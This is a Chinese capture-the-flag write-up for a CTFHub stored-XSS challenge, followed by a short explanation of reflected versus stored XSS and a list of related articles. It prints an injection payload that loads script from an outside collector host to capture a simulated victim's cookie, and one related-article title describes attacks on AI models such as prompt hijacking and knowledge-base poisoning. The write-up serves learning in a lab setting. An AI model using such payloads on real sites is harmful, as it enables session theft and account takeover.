CTFHub | 存储型

0x00 前言

CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

0x01 题目描述

存储型:

(无)
网页显示内容

0x02 解题过程

检查网页显示内容发现有一个输入框以及一个提交表单。可以在这个输入框中输入你的名字并提交。第二个输入框是发送构造好的 XSS 链接给机器人模拟执行。

同样使用 scripts 标签写入一个警告弹窗,警告内容自定义。

javascript 复制代码
<script>alert("flag")</script>

点击提交表单按钮,发现成功跳出警告弹窗,说明此题存在 XSS 漏洞。

这里还是使用 XSS Platform 平台接受传递的参数。根据提示,将第一行代码植入到怀疑出现 xss 的地方(注意'的转义)。

javascript 复制代码
</textarea>'"><script src=http://xxx.xxx.xxx.xxx/Q7yYOv?1702702862></script>

我们先访问 XSS Platform 平台查看是否有传递过来的参数,发现 Cookie 中没有数据。

存储型 XSS 漏洞同样也需要目标用户去访问这个链接才可以成功执行。直接使用题目 URL 链接发送到第二个输入框模拟目标用户访问链接。成功执行。

再次访问 XSS Platform 平台,发现此题 flag 。

0x03 反射型 & 存储型

反射型 XSS 漏洞与存储型 XSS 漏洞区别的流程图

反射型

反射型 XSS 漏洞是指攻击者将恶意脚本注入到 URL 参数中,然后将这个 URL 发送给目标用户。当目标用户访问这个受污染的 URL 时, 这个 XSS 漏洞就会被执行。

存储型

存储型 XSS 漏洞是指攻击者将恶意脚本上传到目标网站的数据库或存储位置中,目标用户访问该网站时,恶意脚本会从服务器中被读取并在目标用户的浏览器中执行。

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

相关推荐
HackTwoHub3 小时前
AI大模型攻击思路,涵盖提示词劫持、知识库投毒、多语种混淆 + 身份伪装、诱导 AI 输出涉密后台核心配置
人工智能·安全·web安全·网络安全·自动化·系统安全·安全架构
2601_9571746520 小时前
零基础学网络安全能学好吗
安全·web安全
味悲1 天前
浏览器解析机制与XSS的15种编码绕过
前端·xss
Chengbei111 天前
VMware Workstation Pro 26H1免费虚拟化利器
运维·安全·web安全·自动化·系统安全·apache·安全架构
云水一下2 天前
DVWA从入门到精通(十八):Cryptography(密码学问题)
web安全·密码学·dvwa
糖果店的幽灵2 天前
安全测试从入门到精通 - 环境搭建与基础工具选择
安全·web安全
云水一下3 天前
DVWA从入门到精通(十七):Open HTTP Redirect(开放重定向)
web安全·dvwa·开放重定向
txg6663 天前
网络安全领域简报(2026年7月3日—10日)
安全·web安全·网络安全
味悲3 天前
XSS、CSRF、SSRF学习笔记
安全·xss·csrf
Chengbei113 天前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构